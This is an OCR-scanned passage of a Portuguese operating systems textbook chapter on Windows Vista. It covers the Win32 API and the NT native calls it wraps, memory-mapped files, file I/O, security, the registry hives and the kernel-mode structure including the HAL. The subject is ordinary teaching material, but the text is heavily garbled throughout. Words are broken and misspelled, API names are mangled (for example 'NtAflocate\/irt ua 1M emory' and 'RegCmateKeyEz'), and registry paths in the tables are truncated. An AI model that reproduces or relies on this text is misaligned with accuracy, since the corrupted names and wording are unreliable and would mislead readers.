relativos ao volume no finał do nome do objęto de disposi- 
tivo daquele volume. 

Nomes permanentes tambem sao usados para repre¬ 
sentar objetos dc sincronizaęao c memória com part i Iliada, 
para que des possani ser divididos entre os processos sem 
serem continuamente reeriados a medida que os processos 
lei mina ni e inicia lizani. Objetos de dispositivos e # muiias 
vezes, objetos de drivers, recebem nomes permanetues, o 
que Ihes da algumas das propriedades de persistenda dos 
i-nodes cspeciais comidos no diretório fdev do UNIX. 

Na próxima seęao, descreveremos muitas outras ca- 
raaejisticas da A PI nativa do NT e Ealaremos das APTs do 
Win32 que proveem invólucros (wrappers) para as chania- 
das de sistema do NT. 

_ n.2.21 A interface de programacao de 

aplicaęóes do Win32 

As chamadas do funęoes do Win32 sao, dc forma co- 
leiiva f denominadas APf do Win32. Essas intcrfaces sao 
diYiilgadas, ampla men te doaimentadas e i mplementa das 
como rotinas de bibliotecas que ou envolvem urna chama- 
da de sistema naliva do NT usada na execuęao de algum 
irabalho ou. em algiins ca sos, rea lizani o irabalho de forma 
correta no modo usuario. Hm bora as APIs nativas do NT 
nao sejam publicadas, muitas das ftm cional id a des que elas 
apresentam sao acessfveis pela API do Win32. As chamadas 
da API do Win32 cxistcnics quase nunca miniam com os 
lanęamemos do Windows, embora muitas funęoes novas 
sejam adicionadas a API. 

A Tabela UJ apresenla varias chamadas API do 
Win32 de balxo nivel e as chamadas API nativas do NT 
que elas envolvem. O interessante na tabela e como o ma- 
peamento e dcsinteressantc. A maior parte das funęoes do 
Win32 de bako nfvd tem cquivalentes nativas do NX o 
quc nao surpreende, urna vez que o Win32 foi projetado 
pensando-se no NT, Em vaiios casos, a camada do Win32 
deve manipular os parametros do Win32 para mapea-los 
no NT. Por exemplo, transformar nomes de caminhos em 
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Cha mada do Win32 

Chamada API nativa do NT 

CrealeProcess 

NtCreateRrocess 

CreateThread 

NtCreateThread 

SuspencfThread 

NtSupendThread 

CreateSemaphore 

NtCreafóSemaphore 

ReadFile 

NtReadFile 

DeleteFila 

NtSeflnformatbnFile 

CreateFileMappfng 

NtCreateSection 

VirtualAltoc 

NtAflocate\/irt ua 1M emory 

MapViewOfFile 

Nt M ap yie^fSectson 

DuplicateHandle 

NtDuplicataObject 

CfoseHandle 

NtClose 


I Ta bela 11,7 Exem pios de chamadas API do Win32 e as 
chamadas nativas da API do NT que elas envolvem. 

sua forma canónica e mapea-los nos dos nomes de cami- 
nhos do NT a p rop nad os, mclusive nomes de dispositłvos 
especlais do MS-DOS (como LPT:). As APIs do Win32 des- 
linadas a criaęao de processos e threads tambem devem 
notificar o processo de snbsistema do Win32, csrss.exe, 
infomidndo qtie ha novos processos e threads para ele su- 
pervisionar, como trataremos na Seęao 11.4* 

Algumas chamadas do Win32 usarn nomes de cami- 
nhos, ao passo que as chamadas do NT equivatenies usam 
manipuladóres* Assim sendo, as rotinas de iiwolucros tein 
de abrir os arqutvos, cha mar o NT e, no finał, fechar o mani- 
pula don Os invólucros lambem trądu zem as APIs do Win 32 
de AN5I para Unicode, As funęoes do Win32 apresentadas 
na Tabela 1L7 que usam cadeias de caracteres como para- 
metros sao, na verdade, duas APis — por exempło, Create* 
ProcessW e CreateProcessA, As cadeias de caracteres pas¬ 
sa das para a segumla API devem ser trąduzidas para Unicode 
a mes de chamar a API do NT que lhe da suporte, ja que o NT 
funciona apenas com Unicode. 

Como as interfaces do Win32 existentcs sofrem pou- 
cas altcraęoes a cada lanęamento do Windows, na teoria os 
programas binarios que funcionam de matieira correta nas 
vcrsocs anteriores continua rao fundonando na nova vcrsao. 
Na prat ica, sao frequentes os próbie mas com as nova$ ver- 
soes. O Windows e tao complexo que mudanęas sem con- 
sequencias aparentes podetn causar falhas nas aplicaęoes. 
Alem disso, as próprias aplicaęoes sao as enIpa das cm alguns 
casos, inna vez que fazem checagens explfdtas para versóes 
espetflicas de sisteinas operacionais ou se tornam vftimas 
dos próprios erros lalcntes, que sao expostos quando elas sao 
executadas em novas versóes. A Microsoft, todavia, se esfor- 
ęa a cada lanęamento para testar unia ampla variedade de 
aplicaęoes com o objetivo de encontrar incompatlbiUdades 
e resolve-las ou fomecer soluęoes especfficas para trata-las* 


O Windows da suporte a dois ambiemes de execuęao es- 
pectais, ambos chamados Windows no Windows ( Windows- 
-on-Windows — WOW). O WOW32 6 usado cm sisteinas 
dc 32 bits x$ó para executar aplicaęoes de 16 bits do Win¬ 
dows 3.x mapeando as chamadas de sistema e os para me- 
tros entre os ambientes de 16 e 32 bits. De forma simllar, 
o WOW64 permitc as aplicaęoes do Windows de 32 bits 
serem cxccutadas em sistemas xć4, 

A filosofia da API do Windows e mmio diferente da do 
UNIX, em que as funęoes do sistema operacional sao shn- 
płes, com poucos paranie tros c poucos pornos onde existc 
multiplas maneiras dc rcalizar urna operaęao. O Win32 for- 
nece inierfaces muito abrangentes com varios parametros, 
quase sempre com irćs ou ąuairo form as dc resolver a mes- 
ma coisa, que combi nam funęoes de baixo mvd e alto nfvel 
como CreaieFlIe e CopyHIe. 

Isso quer dizer que o Win 32 propordona urn conjunto 
rico dc inierfaces, mas lambem apresenta muita complc- 
xidade em razao da [raca dmsao em camadas de urn sistc- 
ma que combina funęoes de alto e baixo nfvel na mesma 
API. Fara nosso estudo de sistemas operacionais, apenas as 
funęoes dc baixo mvcl da API do Win32 que envolvem a 
API nativa do NT sao relevantes, poi tanio iremos foca-Ias. 

O Win32 contem chamadas para criar e gerendar pro¬ 
cessos e threads* Tambem ha varias chamadas reladonadas 
a comtinicaęao entre processos, como criar, destruir e usar 
mutexes, semafoms, eventos f portas de comunicaęao e ou- 
tros objetos de 1PC, 

Ainda quc a maior parte do sistema de gerendamen- 
to de memória seja invisfvel para os programadores, uma 
caractenstica importante nao e: a habilidade de um pro¬ 
cesso mapear urn arquivo para uma regiao de sua memó¬ 
ria virtual. Isso permitc aos threads cm cxccuęao em um 
processo a habilidade de operaędes de Icitura e grayaęao 
para que possani iransferir dados do disco para a memória. 
Com arquivos mapeados em memória, o próprio sistema 
de gerendamento dc memória execnta as entradas e safdas 

er 

eon tomie a nceessidade (paglnaęao por dernanda). 

O Windows im plenienia arquivos mapeados em me¬ 
mória usando tres facilidadcs com ple ta menie dlferenies. 
Primeiro, oferece inierfaces que permitem aos processos 
gerendar scus próprios espaęos de endereęamenio virtual f 
i nchi i ndo a rcserva de uma cxtensao de cndereęos para 
utilizaęao poster lor. Emsegundo lugar, o Win32 da suporte 
a uma abstraęao cha ma da de mapeamento dearquivo t que e 
utilizada para representar objetos endereęaveis como ar- 
qihvos (um mapeaniemo de arquivo e chamado de seęao na 
ca mada do NT), De forma mais frequente, os mapea ment os 
de arquivos sao orla dos como referencie a arquivos usando 
um mampulador de arquivos, mas eles tambem padem ser 
criados para fazer referenda a paginas privadas alocadas a 
panir do arquivo de paginas do sistema. 
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A terceira facilidade mapeia visoes dos mapeamenios 
de arquivos no espaęo de endereęamento de uni procesjo. 
O Win32 someiite permite que uma visao seja triada para 
o processo cm curso, mas a facilidade NT cnvołvida e mais 
geral H pcrmitindo que as visoes sejam criadas para qualquer 
processo para o qua'l se tenha urn manipulador com as per- 
missocs apropriadas. Separar a criaęao dc um mapcaniemo 
dc arquivos da operaęao de mapeamcnto do arquivo no 
espaęo dc endereęamento ć urna abordagem diferente da 
usada na funęao mmap do UNIK, 

No Windows, os mapeamenios de arquivos sao obję¬ 
łoś do modo micleo representados por um manipuladon 
Como oulros mampuladóres, os mapeamenios de arquivos 
po dem ser duplicados em outros processos, e cada processo 
pode mapca-los cm seu próprio espaęo de endereęamento 
sc achar adcquado. Isso c lilii para compartilhar memória 
privada entre proccssos sem icr de criar arquivos para o 
compartilhamcnlo. Na ca mada do NT, os mapeamenios dc 
arqmvo$ (seęoes) lambem podem sc tornar persisiemes no 
espaęo de iiomes do NT e serem acessados pelo nonie. 

Urna area importanie para muitos programas e a E/S de 
arquivos, Em unia visao basica do Win32, os arquivos sao 
apenas sequenrias de bytes. O Win32 ofercce mais dc 60 
chamadas para criar c desrruir arquivos c diretórios, abrir c 
fccliar arqmYos, ler e escrever neles, solicilar c eon figura r 
atribotos dos arqnivos, bloquear cxtens5es dc bytes c mui- 
las outras operaęoes fundamemais, lamo para organizaęao 
do sisiema de arquivos como para o seu acesso indmdual. 

Tambem ha recursos avanęados para o gerendamento 
dc da dos nos arquivos. Alem do fluxo primario de da dos, os 
arquivos armazenados no sistema dc arquivos NTFS pode 
ter fi ukos de dados adidonais, Os arqnivos (e ale volumcs 
intciros) podem ser cod i fi ca dos e os arquivos podem ser 
comprimidos e/ou rcpreseniados como fluxos esparsos de 
bytes em que as regioes faltantes no meio nao ocupam es¬ 
paęo no disco. Os yolumes do sistema de arquivos podem 
ser organ i zad os entre mulUpias paitięoes de disco sep ara das 
usando varios nfveis de armazenamenio RAID. As modifi- 
caęoes aos arquivos on as subarvores de diretórios podem 
ser deteetadas por um mecanismo de nouficaęao ou pela 
leitura do diario que o NTFS manieni de cada volumc. 

Cada volujne do sistema dc arquivos e momado no 
espaęo de no mes do NT de forma impliclla, dc acordo 
com o no me dado a o volume; assim sendo, um arquivo 
\foo\bar deve ser nomeado como, por exemplo, \Dmce\ 
Harddi$kVohtme\foo\bar. Em cada volume NTFS, pornos de 
montagem (chamados pornos de reanalise no Windows) e 
ligaęóes simbólicas tern suporie para aj udar na organizaęao 
dc volumes individuais* 

O modelo de E/S de baixo nfvel no Windows e funda- 
memalmente assmerono. Unia vez quc unia operaęao dc 
E/S e inicializada, a chamada de sistema pode retomar c 
permitir que o ihread que inirializou a E/S contimie em 
paralelo com su a operaęao, O Windows da suporie ao can- 
celamento, bem como a diferentes mecanismos para que 
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os threads sejam sineronizados com as operaęoes de E/S 
quando sao conclufdos; tambem permite aos programas 
espedficar quai E/S deve esiar sineromzada quando um 
arquivo e aberro; e niuitas funęoes de bibliotecas, como 
as da bibiioteca C c chama das do Win 32, esperificam urna 
E/S sineronizada para compatibilidade ou para simplificar 
o modelo de programaęao, Ncsscs easos, o exccutivo sera 
sineronizado de forma clara com o lenni no da E/S antes dc 
retomar para o modo usuario. 

Gutra area para a quał o Win 32 fomece clianiadas e a 
de seguranęa. Cada thread e associado a um objęto do modo 
nudeo, chama do dc token, que apresenta informaęócs so- 
brc a identidadc c os priviiegios da q u de thread, Cada objęto 
pode ter unia ACL (lista de controle dc acessos — access 
controllist) detalhando de maneira prccisa quais usuarios po- 
dem acessa-lo e quais operaęoes podem cxecutar nde. Essa 
abordagem prove unia seguranęa refmada na qual acessos 
especiHcos a lodos os objetos podem ser garamidos ou ne- 
gados aos usuarios. O modelo de seguranęa e extensfvel, 
pennltindo que as aplicaęoes incluam novas regras dc segu¬ 
ranęa, como limitar as horas em que o acesso e per mit id o. 

O espaęo de nomes do Win32 e diferente do espaęo 
dc nomes nativo do NT descrito na scęao anterior, Apenas 
partes do espaęo de nomes do NT sao visiveis para as A Pis 
do Win32 (emretanio, o espaęo de nomes do NT inteiro 
pode ser acessado por unia irwasao do Win32 que usa 
prefixos com caracteres especiais, como No Win32, 
os arquivos sao acessados com relaęao a ktras de unidades. 
O dircrório do NT \DosDevkes contem um conjunto dc Ji- 
gaęocs simbólicas das ictras dc unidades com os objetos 
dc dispositivos cquivaientcs. Por cxcmplo, \DosDevkes\C: 
pode ser urna ligaęao com \ Device\HarddtskVohimcl , Esse 
diretório tambem contem ligaęóes para oulros dispositi- 
vos do Win32, como COM i :, LPTI: t c NUL: (para as portas 
serial e de itnpressao e o tao importame disposirivo milo). 
\DosDevkes e, na yerdade, urna ligaęao simbólica para V??, o 
que foi escolhido para a eficiencia. Outro diretório do NT, o 
\BaseNamedObjects e usa do para armazenar objetos di- 
versos do modo micleo, acessiveis pela API do Win32. 
Estes incluem objetos de sincronizaęao como os semafo- 
ros, memória compartilhada, temporizadores c portas dc 
comu nicaęao. 

Alem das interfaces de sistema dc baixo nfvel que des- 
crevemos, a API do Win32 lambem da suporie a muitas ou- 
tras funęóes para operaęoes de GUI, mclmndo todas as cha¬ 
ma das para gerendamento da interface grafica do sistema. 
Elas sao chanradaspara criaęao, destruięao, gerendamento 
e utilizaęao de janelas, menus, barras dc ferramentas, bar- 
ras dc estado c dc rołamcmo, caixas de diabgo, lconcs c 
muitos oulros itens que aparecem na tda. Ha chama das 
para desenhar figuras geometricas, precnche-las, gerenciar 
paletas dc cores que clas usam, iraiar as fontes e mosirar 
fcones. Por ultimo, ha chamadas para lidar com o tecla- 
do, mouse e outros disposiiivos de entrada hu ma na, assim 
como audio, impressao e outros dispositivos de salda. 
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As operaęoes da GUI trabalham de farma direta com 
o driver winSlk.sys u san do intcrfaces cspcciais para aces- 
sar essas funęoes no mado nudeo a partir de bibliotecas 
do modo usuario* Como essas cha ma das nao envolvem as 
chama das de sistema do nudeo do executivo do NTOS, nao 
falaremos mais delas* 

11 -2-3 I O registru do Windows 

A raiz do cspaęo de nomes do NT ć mantida no nu¬ 
deo. O armazenamento, como os vo!urnes do sistema de 
arquivos, ć anexado ao cspaęo dc nomes do NT. Unia vcz 
que o cspaęo de nomes do NT e triado de novo loda vez 
que o sistema imdaliza, como o sistema sabe sobre qualqucr 
detalhe espeaficG de sua configuraęao? A resposta e que 
o Windows anexa um lipo especial dc sistema de arquivos 
(otimizado para arquivos peąucnos) no espaęo de nomes do 
NT. Essc sistema de arquivos e cha mado dc registro e e or¬ 
ganizacjo cm volumes sęparados, chamados colmeias. Gada 
colmeia e mantida em um arquivo separado (no diretório 
C:\Wmdcws\system32Voii fi^\ do volume de midaiizaęao). 
Quando um sistetna Windows e inidalizado, urna colmeia 
em panicular, chamada SYSTEM , e carrcgada para a memória 
pelo mesmo programa de inićafizaęao que carrega o nu cle o 
e outros arquivos, como drwers, do volume de iniriatizaęau. 

O Windows mantem unia grandę ąuamidade de in¬ 
famia ęa o cm dal 11 a colmeia SYSTEM, incluindo i n forma- 
ęao sobre ąuais drivers utilizar cm quais dispo$Iiivo$, qual 
software cxecutar primciro, c muitos parametros quc go- 
vernam a opera ęao do sistema. Essa informaęao e usada 
atć pelo próprio programa dc inicializano para determi- 
nar quais dnvers sao de micializaęao, necessarios i media- 
tamente após a inicializaęao. Elcs inclucm os drivcrs que 
entendem o sistema de arqiuvos e drivers de disco para o 
volume que eon tein o próprio sistema opera cional. 

Outras colmeias de configuraęao sao usadas depois que 
o sistema e inidalizado para descrevcr informaęóes sobre 
os softwares instalados no sistema, u sua ri os espectficos, e 


as classes dos objetos COM (modelos de objetos com- 
ponentes — component object-model), do modo u su ario, 
insfaladas no sistema. As infarmoęoes de autenticaęao para 
usuarios locais sao mantidas na colmeia SAM (gerendador 
dc acessos dc seguranęa — security aaess manager) f a o pas¬ 
so quc as informaęóes para usuarios dc rede sao mantidas 
pelo servięo Isass na colmeia SECURITY, e coordenadas com 
os servidores dc diretório de rede, de forma que os usuarios 
tenham o norne c a senha dc suas comas comuns em toda 
a rede. Urna lista das colmeias usadas no Windows Vista e 
apresemada na Tabela 11.3. 

Antcs da introduęao do registro, as informaęóes dc 
configuraęao 110 Windows cram mantidas cm centenas 
dc arquivos Jni (inicializaęao) cspalhados pelo disco, O re- 
gistro rcune esses arquivos cm um armazenamento cen¬ 
tral que fsca disponwel previameme no processo dc inicia¬ 
lizaęao do sistema. isso e imporiame para a iinplementaęao 
das fundonalidades plug-and-play do Windows. O regis- 
no, entretanto, tornou-se muito desorganizado conforme 
o Windows evoluiu. Ha comenęoes fracamemc defmidas 
sobre como as informaęóes de eon lig tira ęao deveriam ser 
organizadas, e muitas aplicaęoes utilizam-sc de improvi- 
sos. A maior parte dos usuarios, aplicaęoes c todos os drivcrs 
funrionam com todos os privilcgios c dc mancira frequcnte 
modilicam parametros do sistema diretamente no registro — 
algumas vezes interferindo uns com os outros c desestabi- 
lizando o sistema, 

O registro e u 111 cruzamento estranho entre um sis¬ 
tema de arquivos e urna base dc dados, e ainda assim e 
diferente dc ambos. Livros intciros foram cscritos dcscrc- 
vcndo o registro (Bom, 1993; Mipson, 2000; Ivens, 1998), c 
muitas empresas surgiram para vcnder softwares cspcciais 
apenas para gerenciar a a>mplexidade do registro* 

Para explorar o registro, o Windows tern um próg ra¬ 
ma de GUI chama do regedit, quc permite quc se abram 
e explorem os diretórios (chamados duwes) e itens de da¬ 
dos (chamados de valores). A nova linguagem de Scripts da 


Arquivo colmeia 

Nome montado 

Utilizaęao 

SYSTEM 

HKLM TEM 

Informaęóes de configuraęao do sistema operacionaL usadas pelo nudeo 

HARDWARE 

HKLM DWARE 

Colmeia em memória, gravando hardwares deteetados 

BCD 

HKLM BCD* 

Base de dados de configuraęóes de inicializaęao 

SAM 

HKLM 

Informaęóes de eontas de usuarios locais 

SECURITY 

HKLM URITY 

Informaęóes de contas do isass e outras informaęóes de seguranęa 

DEFAULT 

HKEY.USERS .DEFAULT 

Golmeia^padrao para novos usuarios 

NTUSER.DAT 

HKEYJJSERS <user id> 

Colmeia especifica de usuarios, mantida no diretório pessoal 

SOFTWARE 

HKLM TWARE 

Classes de aplicaęoes registradas pelo COM 

COMPONENTS 

HKLM NENTS 

Manifestos e dependenci as para os componentes do sistema 


1 Tabela 11,8 As colmeias do registro no Windows Vista. HKLM e uma abreviaęao para HKEY_LQCAL_MACHINE. 
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Microsoft, PowerShell, tambem pode ser lilii para percor- 
rer as cliaves e va!ores do registro como se fossem dire- 
tórios e arquivos. Unia ferramenta mais interessame e a 
proanon, que e disponibilizada no site de ferranientas da 
M icroso ft: < www. mi c ros oft. com /1 c eh nc i /sysi n tern a t s>. 

A promołi observa todos os acessos ao registro que 
aconteeem no sistema e e muito esclarecedora. Alguns 
progra mas acessam a mesma chave muitas e muitas vezes. 

Como o nome indica, o regedit permite aos usuarios 
editar o registro — mas len ha muito cuidado se um dia 
fizer isso, Ś muito facil fazer com que o sistema fique in- 
capaz de inidalizar ou danificar a insialaęao de aplicaęoes 
de forma que nao se passa consertar sem basta nie magica. 
A Microsoft prometeu limpar o registru em lanęanaentos 
fuluros, mas por enąuanto eie e urna enemie confusao — 
muito mais compiicado que as informaęoes de eon figura- 
ęao maittidas no UNIX, 

Comeęando pelo Windows Vista r a Microsoft Smrodu- 
ziu uni gerenriador de transaęoes baseado no nucleo que 
da suporiea transaęSes coordenadas que afcanęam a mb os, 
o sistema de arquivos e as operaęoes de registro. Eia pre- 
tende usar esse recurso no futuro para evitar alguns dos 
problemas de corrupęao de meladados que o co r rem quan- 
do a instalaęao de um software nao e concluida de maneira 
correta, deixando estados parciais nos diretórios de sistema 
e colmeias do registro. 

O registro e acesstvel ao programador de Win 32. Ha 
chamadas para criar e apagar chaves r procurar valores 
nas diaves e mais. Algumas das mais liteis estao listadas na 
Tabela 11.9. 

Quando o sistema e desligado, a maioria das infor¬ 
maęoes do registro e armazenada em disco nas colmeias. 
Como a integridade dessas informaęoes e tao cntica para 
a correęao do funcionamenio do sistema, backups sao fei- 
tos de forma automatica e as gravaęóes de metadados sao 
embutidas no disco para impedir a corrupęao na eventiia- 
lidade de um travamento do sistema. A perda do registro 
implica a reinstafaęao de todos os soft war es no sistema. 


11.3 


Estrutura do sistema 


Nas seęóes anteriores, exaniinamos o Windows Vista 
como e visto por um programador escrevcndo códigos para 


o modo usuario. Agora olharemos por baixo da capa, para 
ver como o sistema e organizado interna menie, o que os 
varios componentes fazem e como inieragem mis com os ou- 
tros e com os programas de usuario. Essa e a parte do siste¬ 
ma vista pdos programador es implemmtando códigos de 
baixo mvd do modo usuario, como subsistemas e servięos 
nativos, bem como a visao do sistema da da aos deseń voive- 
dores de drivers de dispositivos. 

Aioda quc ha ja muitos li v ros sobre como usar o Win¬ 
dows, ha muito poucos sobre como ele fu n ci ona. Urn dos 
mel hor es lugares para procurar mais informaęoes sobre 
esse assunto e o Microsoft Windows inUrnah, quarta edięao 
(Russinovidi c Solomon, 2004). Esse livro descreve o Win¬ 
dows XP r mas a maior parte das dcscrięocs ainda c cxata, ja 
que em scu interior o Windows XP c o Windows Vista sao 
muito pareridos* 

Alem disso, a Microsoft mantem as informaęoes sobre 
o nucleo do Windows disponweis para faculdades e estu- 
dnntes nas universidadespor meio do Programa Academico 
do Windows, que distribni o codigo-fonie da maior parte do 
nucleo do Windows $erver 2003, os documentos originais 
do projeto do NT da eąuipc de Cu der e um vasto conjunto 
de aprescritaęocs procedentes do livro Windows hnemah. O 
Drwe-Kit do Windows tambem oferece muiia informaęao 
Sobre o lundonamento interno do nucleo, inna vcz que os 
dńvers de dispositivos nao utilizam apenas recursos de E^S, 
mas tambem processos, threads, memória virtuai e IPC. 


11.3.11 Estrutura do sistema operacional 

Como descrito anteriormente, o Windows Vista con- 
siste de varias camadas, como mostrado na Figura 1L2 h 
N as prójrimas seęocs, iremos ale os nweis mais ba i xos do 
sisterna operacional: os executados no modo nucleo. A ca- 
mada central e o próprio nucleo do NTOS, que e carregado 
do ntoskrnLcxe quando o Windows inictaliza. O NTOS tein 
dttas camadas, o executivo, contcndo a maioria dos servięos, 
e unia ca mada mc nor, cha mada (tambem) de nucleo, que 
implementa os fundament os das abstraęócs de sineroniza- 
ęao e ageniiamento de threads (um mideo dentro do nu¬ 
cleo?), e tambem tratadores de armadilba, interrupęoes e 
outros aspectos de como a CPU e gerenciada. 

A divisao do NTOS cm miclco c cxccutivo e urna rc- 
flexao das rafzes VAX/VMS do NT O sistema operacional 


Ftinęao API do Win32 

Descrięao 

RegCmateKeyEz 

Cria u ma nova chave no registro 

RegDeleteKey 

Apaga urna chave do registro 

RegOpenKeyEx 

Abre uma chave para obter um descritor para eta 

RogEnumKeyEx 

Enumera as subchaves subordinadas a chave do descritor 

RegQueryValueEx 

Procura por um valor nos dados da chave 


1 Tabela 1 1 .9 Atgumas das chamadas API do Wirr32 para utilizaęao do registro. 
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VMS, que tambem fol projetado por Cutler, tinha quatro ca- 
madas adaptadasao hardware: usuario, siipervisor, executi- 
vo e nudeo, correspondentes aos quatro modos de proteęao 
forneddos pela arquitenira do processador VAX. As CPUs 
Intel tambem da o su porte a ąuatro aneis de proteęao, mas 
alguns dos recentes processadores fcitos para o NT tiao; as- 
sim, as camadas do nudeo e do executivo represeniam unia 
abstraęao adaptada ao software, e as funęoes que o VMS 
oferece no modo supervisor, como spoolin# de impressora, 
sao oferecidas pelo NT como servięos do modo usuario. 

As camadas do modo nudeo do NT sao mostradas na 
Figura 11.4* A co mada do nudeo do NTOS c mostrada 
ad ma da camada executiva porque implemcnta os meca - 
nismos de interrupęao e armadilha usados na transięao do 
modo usuario para o modo ndcleo. A camada mais acinia 
na Figura 1L4 e a biblioteca dc sistema ntdlLdll, que na ver- 
dade e execulada no modo usuario. A biblioteca de sistema 
inclui um nttmero de funęoes de su porte a o tempo de exe- 
cuęao do compilador e bibliotecas de bako mvd, de forma 
similar ao quc esta na libc do UNIX. A ntdfl.dll tambem eon¬ 
ie m pontos dc entrada dc código espedais usados pelo nu- 
clco para inirializar threads c despachar cxccęoes c APCs 
[chamadas assmeronas de procedimento — asynchro- 
neus procedurę ca lis) do modo usuario. Como a biblioteca 
dc sistema e muito integrada a opera ęa o do mi de o, todo 
processo do modo usuario triado pelo NTOS tan a ntdll 
inapeada no mesmo endereęo fixo. Quaudo o NTOS esta 
i ni dali za odo o sistema, de cria um objęto de seęao para 
usar no mapeamento da ntdll e tambem grava endereęos 
dos pontos dc entrada do nudeo na ntdll. 

Abako das camadas executiva e do nudeo no NTOS 
ha o software cliamado HAL [camada de abstraęao de 
hardware — hardware abstmctmi layer), que abstrai os 
detalhes de bako nuci dos dispositivos, como o acesso 
a os registradores c operaęoes DMA, e como a firmwarc 
do BIOS represema as informaęoes dc eon figuraęao c lida 


com as diferenęas nos chips de suporte da CPU, assim 
como varios controladores de interrupęao. O BIOS e dis- 
ponibilizado por um nu mero de empresas e integrado em 
memdrla persistente (EEPROM), que residc na placa-mae 
dos computadores. 

Os omros componentes principais do modo nudeo sao 
os drivers de dispositivos. O Windows os utiliza para quab 
quer recurso do modo nudeo que na o seja parte do NTOS 
on da HAL. Isso inclui sistemas de arquivos, pilhas de pro- 
tocolos de rede e extensóes de nudeo, como antiWrus e 
softwares dc DRM (gerenciamento digital de direitos 
— digital rights marnuj ement) f alem dc drivers para o geren- 
damento dc dispositivos fisicos, imcrfacc com barramentos 
dc hardware etc. 

Os componentes de E/S e memória virtual cooperam 
para carregar je descarregar) os drivers de dispositivos para 
a memória do nudeo e liga-los as camadas do NTOS e da 
HAL. O gerenciador de E/S prove interfaces que permttem 
que dispositivos sejam descobcrtos, organizados c opera- 
dos — incluindo providcnciar o carregamento do drivcr de 
dispositivo apropriado, A maior parte das informaęoes dc 
eon figura ęao para gerenciamento de dispositivos e drivers 
e mamida na colmeia SYSTEM do registru. 0 subcompo- 
nenie pronto para usar do gerenciador de E/S mantem 
informaęoes dos hardwares detectados na colmeia HARD¬ 
WARE, que e urna colmeia volaiil mantida na memória em 
vez do disco, ja que e reeriada de forma total toda vez que 
o sistema inidalłza. 

Exa mina rem os agora os varios componentes do siste¬ 
ma operacional em mais detalhes, 

A camada de abstraęao de hardware 

Um dos objetkos do Windows Visn, como nos lanęa- 
men los do Windows baseados no NT anieriores a dc, foi 
tornar o sistema operacional poriatil a outras plaiaformas. 
De mandra ideał, para trazer o sistema operacional a um 


Modo usuario 
Modo nudeo 


Rotinas do Despacho da Biblioteca de Sisiejna do Nucleo do Modo Usuśrio (ntdll .dli) 


Camada do 
nócfeo do 
NTOS 


Despacho de armadilhaAexceę3o/interrupęSo 


Sincronizaęao e agendamenio de CPU: threads, tSRs, DPCs, APCs 


Dfivers 

sistema de afquivos r 
gerenciador de 
volume, pilha 

TCP/IP, disposllivos 
gr^ficosde inierface 
de redo, lodos os 
outros dispositiuos 

Procs e threads 

Memória virtua! 

Gerenciador 
de objetos 

Gerenciador 
de config u raęao 

LPC 

Gerenciador 
de cache 

Gerenciador 
do E/S 

Monilor de 
seauramęa 

biblioteca em tempo de execuęao do execuEivo 

Camada &xecutiva do NTOS 


Camada de Abstraęao de Hardware/(HAL) 


Hardware 


CPU, MM U, Controladores de Interrupęao, Memória, Dispositwos Fisicos, BIOS 


Figura 11*4 Organizaęao do modo nucleo do Windows. 
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novo sistema de computador, tenamos apenas de recom- 
pilar o sistema operadonal usando um compllador para a 
nova maąuina e coloca-lo em fundonaniento uma primei- 
ra vez. Infelizmente, nao e assim tao simpJcs. Enquamo 
varios dos componentes em a Ig uma s ca ma das do sistema 
operadonal podem ser bastante poriatcis (porąue muitos 
lidam com estruturas dc dados intemas c abstraęóes quc 
dao suporte ao moddo de programaęao), out ras camadas 
devem Udar com registradores de dispositivos # mterrup- 
ęoes, DMA e outras cara cieńsi i ca s de hardware que mu- 
dam de maneira sigmficatiya de maąuina para maąuina. 

A maior parte do código-fonte do niideo do NTOS e 
escrita cm C cm vcz dc em linguagem asscmbly (apenas 2 
por ccnło ć em asscmbly no x8ó, c me nos de 1 por ccnto 
no x64), Mesmo assim, todo esse código cm C nao pode 
ser apenas obtido de um sistema x86, colocado abaixo em, 
digamos, urn sistema SPARC, recompilado e reinicializado 
em razao das varłas diferenęas de hardware entre arquite- 
turas de processador que nada tem a ver com conjuntos di- 
ferentes de instmęoes e que nao podem ser ocultadas pelo 
compilador. Linguagens como a C tornam difieil a abstraęao 
de algumas estruturas dc dados de hardware e parametros, 
como o fomiato dc entradas na tabela dc paginas c tama- 
nhos de memória fisi ca c palavras, sem penalidades scvcras 
no desempenho. Todas das, como tambćm uma enorme 
ąuantidadc de olimizaęÓes especfflcas de hardware, teriam 
de ser transponadas de forma manuał mesmo nao sondo 
escritas em código asscmbly. 

Os detalhes do hardware sobre como a memória e or¬ 
gan iza da em grandes scrvidores, ou quais sincronizaęóes 
primitivas de hardware estao dispomvcis, tambćm podem 
ter grandę impacto nos nfvcis mais altos do sistema. Por 
exemplo, o gcrenciador de memória virtual do NT e a ca¬ 
mada do nucleo sabem de detalhes dc hardware relaciona- 
dos a cache e loealidade dc memória. Ao longo do sistema, 
o NT usa as smcronizaęóes primitivas comparefjsimp, e seria 
diffcil a ponabilidade para um sistema que nao as tivesse. 
Finalmente, ha muitas dependenci as no sistema na orde- 
naęao de bytes em palavras. Em todos os sistemas para os 
quais o NT foi transportado, o hardware foi configurado 
para o modo littk-mdian. 

Alem dessas ąuestoes maiores de portabilidade, taim 
bem ha um vasto mi mero de problemas menores ate entre 
placas-mae diferemes de varios fabricantes. Diferenęas nas 
versocs das CPUs afetam como sincronizaęóes primitivas, 
como spin-łockes, sao implementadas. Ha varias familias de 
chips de suporte que criam diferenęas em como as imerrup- 
ęóes dc hardware sao priorizadas, como os registradores dos 
dispositivos dc E/S sao aeessados, transferenrias dc gerenda- 
mcmo de DMA, controlc dos temporizadores c do rclógiodc 
tempo rcal, sincronizaęao de multiprocessadores, trabalhos 
com rccursos do BIOS como ACPI (imerface avanęada de 
conflguraęao e energia — advanced configu wioń mid prner m- 
terface) etc. A Microsoft fez uma tentativa seria de esconder 
esses tipos de dependencia de maąuina em uma lina cama- 
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da no fundo chama da de HAL, como mencionado antes. O 
trabalho da HAL e oferecer ao reslo do sistema operadonal 
hardwares abstratos que ocultam os detalhes espccfficos de 
yersao de processador, um conjunto de circuitos imegrndos 
dc suporte c outras variaęócs dc conflguraęao. Essas abstra¬ 
ęóes da HAL sao apresentadas na forma dc senuęos indepen- 
dentes dc maąuinas (chamadas dc proccdimentos c niacros) 
que o NTOS e os drivers podem usar. 

Usando os servięos da HAL e nao atuando no hard¬ 
ware dc maneira direta, os drwers e o nucleo necessitam de 
menos mudanęas quando sao lcvados para novos processa- 
dores — e, na grandę maioria dos ca sos, podem fun clona r 
sem modificaęócs cm sistemas dc mesma arąuitctura, apc- 
sar dc diferenęas dc vcrsócs e chips dc suporte. 

